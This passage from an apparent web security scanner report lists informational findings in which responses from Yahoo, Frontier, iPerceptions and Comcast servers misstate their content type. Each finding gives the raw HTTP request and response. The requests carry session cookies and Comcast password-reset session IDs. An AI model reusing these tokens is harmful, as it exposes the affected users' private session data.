myc_s=d=nOa115432jLC_cSLwuu_lf4CTd6wQPmHPCA2hP1vQO94THfsuViFbH9mcyI_cr0GP9r0rbetQe8z05xV0Z2o4v5lJRZq8SECI0sk60MsqlHumxoaEan_CngqSvJugqGvksvtgsUNoY8vL9_WpFoPYA5m101VjH_Pitvzb_GmYa019lCJFv2m_NEOXzQtq88.KW.F1SW5xpMo5OCinwcf0GL2rIl_kSrzrG.HFpDrEfGrrxXa18kfeCfkRX1QRTUCkse0NtJ63f4d2bPZUUp6IKxQ.C2G0OdbxWhxiMkjTmH0JcuI3jcyENUWnjYBj6dd7nxfqt_liAQa2Fwu9j37WJ.uQsq4ifKSL7i_6ftSyEgKdKhwyM6bY_BY.daS4egAYqHbhrR.g97x2ik02QNDK01volhxF5DES8RS6IaT3J4kbDJKNubXAO6Y_l02pZGmiRaKpmpaztnZZY_uwIWGVCTbDHJPpswsjyjP5Dcq0XIm1tkmPP2OrOSbmUWmft2JHYnOn2TmUuDZHZWA1X0RI4H8QHD39X5im7fBk7hIskxCD0kfgLG3KUPqJu.EsvuVefk.._mcFbJ0Wtxy4x9x_jt54PqFCbOQoObGtvHFevI25eKgw6kz6OQKwmHA10QFFqyBvqy0abhz9r_HlgX7F6z61jFeREhCedssKNsUjJ.qOvQ39C..SfEF80O7fwUowNksedhAHbANPtVyXDhD0ZlbIeUp_PVZhGmurZ9iB1nbQWrdgzuEOPhhoCHVq3E8RvzDzDJPZ198uGLqzzGoqyyNVyl8yPvY.IGWZBbEWla74QSx6sa5J8C6Z2ckXD_vcuihU_amd6fVcjiXIMr4cHxHd2h.1zlF4gU-&v=2; MYTMI=4; MYTCK=AgBOZhIQAE%2FJEABiqRAAIboQAHvh

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:52 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: U_mtupes=YToyOntzOjE6ImIiO3M6MTM6IjAzZzRmbnA3NmM0aTAiO3M6MjoibXQiO2k6MTMxNTMxMjE5Mjt9; expires=Fri, 06-Sep-2013 12:29:52 GMT; path=/; domain=my.yahoo.com
Expires: Thu, 01 Jan 1995 22:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:29:52 GMT
Cache-Control: private, no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: U_mtupes=deleted; expires=Mon, 06-Sep-2010 12:29:51 GMT; path=/; domain=my.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/json; charset=utf-8
Content-Length: 166

[{"_status":1,"html":null,"_error":"We noticed you may have signed in or signed out in another window. Click OK to reload your page.","_errorCode":2048,"_txnid":"2"}]

25.18. http://games.frontier.com/WebAnalysis/APP/GenerateCode.ashx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://games.frontier.com
Path:   /WebAnalysis/APP/GenerateCode.ashx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /WebAnalysis/APP/GenerateCode.ashx?pagefilename=homepage& HTTP/1.1
Host: games.frontier.com
Proxy-Connection: keep-alive
Referer: http://games.frontier.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 3314
Cache-Control: private, max-age=14379
Date: Tue, 06 Sep 2011 12:45:50 GMT
Connection: close

try{var s_account='oberonfrontier';
var s=s_gi(s_account);
GameCatalog.WebAnalysis.SiteTracking.Replacer.symbols = {'%%tcp-disconnect-status%%' : function(){ return GameShell.GetTcpDisconnectStatus
...[SNIP]...

25.19. http://games.frontier.com/graphics/frontier/1000/site/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://games.frontier.com
Path:   /graphics/frontier/1000/site/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /graphics/frontier/1000/site/favicon.ico HTTP/1.1
Host: games.frontier.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 8
Date: Tue, 06 Sep 2011 12:45:41 GMT
Connection: close

404 oops

25.20. http://ips-invite.iperceptions.com/webValidator.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ips-invite.iperceptions.com
Path:   /webValidator.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /webValidator.aspx?sdfc=9014a8fa-937-a77aeb94-4e7a-4e23-a045-ac680a9b8baa&lID=1&loc=STUDY&cD=90&rF=False&iType=1&domainname=0 HTTP/1.1
Host: ips-invite.iperceptions.com
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Srv-By: IPS-INVITE04
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
Date: Tue, 06 Sep 2011 12:46:22 GMT
Content-Length: 1262

var sID= '937'; var sC= 'IPE937';var rF='False'; var brow= 'Chrome'; var vers= '13'; var lID= '1'; var loc= 'STUDY'; var ps='sdfc=9014a8fa-937-a77aeb94-4e7a-4e23-a045-ac680a9b8baa&lID=1&loc=STUDY&cD=9
...[SNIP]...

25.21. https://login.comcast.net/myaccount/images/overlay-bg.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://login.comcast.net
Path:   /myaccount/images/overlay-bg.png

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

GET /myaccount/images/overlay-bg.png HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:29 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=496
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 2792

.PNG
.
...IHDR....................    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

25.22. https://login.comcast.net/myaccount/images/sprites/base.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://login.comcast.net
Path:   /myaccount/images/sprites/base.png

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

GET /myaccount/images/sprites/base.png HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:33 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=498
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 14752

.PNG
.
...IHDR...h................    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

25.23. https://login.comcast.net/myaccount/images/sprites/gradient.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://login.comcast.net
Path:   /myaccount/images/sprites/gradient.png

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

GET /myaccount/images/sprites/gradient.png HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:29 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=487
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 5060

.PNG
.
...IHDR..............i.r....tEXtSoftware.Adobe ImageReadyq.e<...yPLTE.........................................................,,,...===............888.........777555......666..."""###%%%)))99
...[SNIP]...

25.24. https://login.comcast.net/myaccount/images/sprites/xfinity_sprite.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://login.comcast.net
Path:   /myaccount/images/sprites/xfinity_sprite.png

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

GET /myaccount/images/sprites/xfinity_sprite.png HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:29 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=314
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 8117

.PNG
.
...IHDR...J...^.............tEXtSoftware.Adobe ImageReadyq.e<....PLTE.$(.&)....MS...700......."&................ &.vy............iii.NS....$)....$(.....!..........wx...................#'....\
...[SNIP]...

25.25. https://login.comcast.net/myaccount/js/additional-methods.min.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://login.comcast.net
Path:   /myaccount/js/additional-methods.min.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /myaccount/js/additional-methods.min.js HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; s_cc=true; s_sq=comcastnet%3D%2526pid%253Dsign%252520in%2526pidt%253D1%2526oid%253Dhttps%25253A//login.comcast.net/myaccount/lookup%25253Fcontinue%25253Dhttps%2525253A%2525252F%2525252Flogin.comcast.net%2525252Flogin%2525253Fs%2525253Dcc%2526ot%253DA; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:27 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:38 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=498
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 8689

/**
* jQuery Validation Plugin 1.8.0
*
* http://bassistance.de/jquery-plugins/jquery-plugin-validation/
* http://docs.jquery.com/Plugins/Validation
*
* Copyright (c) 2006 - 2011 J..rn Zaefferer

...[SNIP]...

25.26. https://login.comcast.net/myaccount/js/jquery-1.5.2.min.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://login.comcast.net
Path:   /myaccount/js/jquery-1.5.2.min.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /myaccount/js/jquery-1.5.2.min.js HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; s_cc=true; s_sq=comcastnet%3D%2526pid%253Dsign%252520in%2526pidt%253D1%2526oid%253Dhttps%25253A//login.comcast.net/myaccount/lookup%25253Fcontinue%25253Dhttps%2525253A%2525252F%2525252Flogin.comcast.net%2525252Flogin%2525253Fs%2525253Dcc%2526ot%253DA; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:27 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:38 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 85925

/*!
* jQuery JavaScript Library v1.5.2
* http://jquery.com/
*
* Copyright 2011, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...

25.27. https://login.comcast.net/myaccount/js/jquery.validate.min.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://login.comcast.net
Path:   /myaccount/js/jquery.validate.min.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /myaccount/js/jquery.validate.min.js HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; s_cc=true; s_sq=comcastnet%3D%2526pid%253Dsign%252520in%2526pidt%253D1%2526oid%253Dhttps%25253A//login.comcast.net/myaccount/lookup%25253Fcontinue%25253Dhttps%2525253A%2525252F%2525252Flogin.comcast.net%2525252Flogin%2525253Fs%2525253Dcc%2526ot%253DA; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:27 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:38 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=499
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 20943

/**
* jQuery Validation Plugin 1.8.0
*
* http://bassistance.de/jquery-plugins/jquery-plugin-validation/
* http://docs.jquery.com/Plugins/Validation
*
* Copyright (c) 2006 - 2011 J..rn Zaefferer

...[SNIP]...

25.28. https://login.comcast.net/myaccount/js/omniture.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://login.comcast.net
Path:   /myaccount/js/omniture.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /myaccount/js/omniture.js HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; s_cc=true; s_sq=comcastnet%3D%2526pid%253Dsign%252520in%2526pidt%253D1%2526oid%253Dhttps%25253A//login.comcast.net/myaccount/lookup%25253Fcontinue%25253Dhttps%2525253A%2525252F%2525252Flogin.comcast.net%2525252Flogin%2525253Fs%2525253Dcc%2526ot%253DA; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:27 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:38 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=494
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 21653

function sTrackSignIn(sPage,sSite,sGuid){ //tracks as a custom link click
   s.linkTrackVars="events,eVar31,eVar32,eVar33,eVar35,eVar36,eVar47,eVar50,prop50";
   s.linkTrackEvents="event28";
   s.events="ev
...[SNIP]...

25.29. https://login.comcast.net/myaccount/js/scripts.min.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://login.comcast.net
Path:   /myaccount/js/scripts.min.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /myaccount/js/scripts.min.js HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; s_cc=true; s_sq=comcastnet%3D%2526pid%253Dsign%252520in%2526pidt%253D1%2526oid%253Dhttps%25253A//login.comcast.net/myaccount/lookup%25253Fcontinue%25253Dhttps%2525253A%2525252F%2525252Flogin.comcast.net%2525252Flogin%2525253Fs%2525253Dcc%2526ot%253DA; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:27 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:31:08 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=495
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 2435

function placeFooter(){var C=$("#bd");var E=$("#ft-outer");var A=C.offset().top+C.outerHeight(true);var B=E.outerHeight(true);var D=($(window).height()>(A+B))?"absolute":"static";E.css({position:D})}f
...[SNIP]...

25.30. http://maps.yahoo.com/services/bizloc/america/bizloc  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://maps.yahoo.com
Path:   /services/bizloc/america/bizloc

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /services/bizloc/america/bizloc?q=&intl=us&mag=13&zoom=13&rn=1315331123041 HTTP/1.1
Host: maps.yahoo.com
Proxy-Connection: keep-alive
Referer: http://maps.yahoo.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223; adxid=016e3b4e6615bdb5; _ygms=z%5E6%26l%5E350+Sansome+Street+San+Francisco+CA+94104+us%26v%5E1%26c%5E37.793676%7C-122.401025

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:23 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Connection: keep-alive, close
Vary: Accept-Encoding
Content-Type: application/json; charset=utf-8
Content-Length: 2

{}

25.31. http://new.music.yahoo.com/chartsHpJS.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://new.music.yahoo.com
Path:   /chartsHpJS.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /chartsHpJS.js HTTP/1.1
Host: new.music.yahoo.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; YMT=d=dj0xJnQ9MCZ0cz0xMzE1MjUxODE1&s=RKnJfnz7ookDnnWANSk9kA--; YMP_VOLUME=0.5; mlap_us=%7B%22d%22%3A%5B%5B%22yahooVideosContainer%22%2C%22ySearch%22%2C%22yMusicImages%22%2C%22yahooAlbums%22%2C%22yNews%22%2C%22Youtube%22%5D%2C%5B%22yahooTracksPopular%22%2C%22yConcerts%22%2C%22lastfm%22%2C%22pandora%22%2C%22flickr%22%2C%22iTunes%22%2C%22Amazon%22%5D%5D%2C%22m%22%3A%22%22%2C%22i%22%3A%22us%22%2C%22v%22%3A%221.1%22%2C%22c%22%3A0%7D; adxid=016e3b4e6615bdb5; BA=t=1315331123; adxf=3078081@1@223.1071929@1@223

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:39 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 3153


YAHOO.music.chartsHPDropDown = new function()
{
this.init = function()
{
   dd=document.getElementById('ymusic-chartselect');
   dd.onchange=function() {
       if(this.selectedIndex!=undefined) {
           YAH
...[SNIP]...

25.32. http://new.music.yahoo.com/rhap_status.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://new.music.yahoo.com
Path:   /rhap_status.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /rhap_status.html?ts=1315331140072 HTTP/1.1
Host: new.music.yahoo.com
Proxy-Connection: keep-alive
Referer: http://l.yimg.com/us.yimg.com/i/us/mus/swf/ymwp/swfproxy-6.0.9.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; YMT=d=dj0xJnQ9MCZ0cz0xMzE1MjUxODE1&s=RKnJfnz7ookDnnWANSk9kA--; YMP_VOLUME=0.5; mlap_us=%7B%22d%22%3A%5B%5B%22yahooVideosContainer%22%2C%22ySearch%22%2C%22yMusicImages%22%2C%22yahooAlbums%22%2C%22yNews%22%2C%22Youtube%22%5D%2C%5B%22yahooTracksPopular%22%2C%22yConcerts%22%2C%22lastfm%22%2C%22pandora%22%2C%22flickr%22%2C%22iTunes%22%2C%22Amazon%22%5D%5D%2C%22m%22%3A%22%22%2C%22i%22%3A%22us%22%2C%22v%22%3A%221.1%22%2C%22c%22%3A0%7D; adxid=016e3b4e6615bdb5; BA=t=1315331123; adxf=3078081@1@223.1071929@1@223

Response

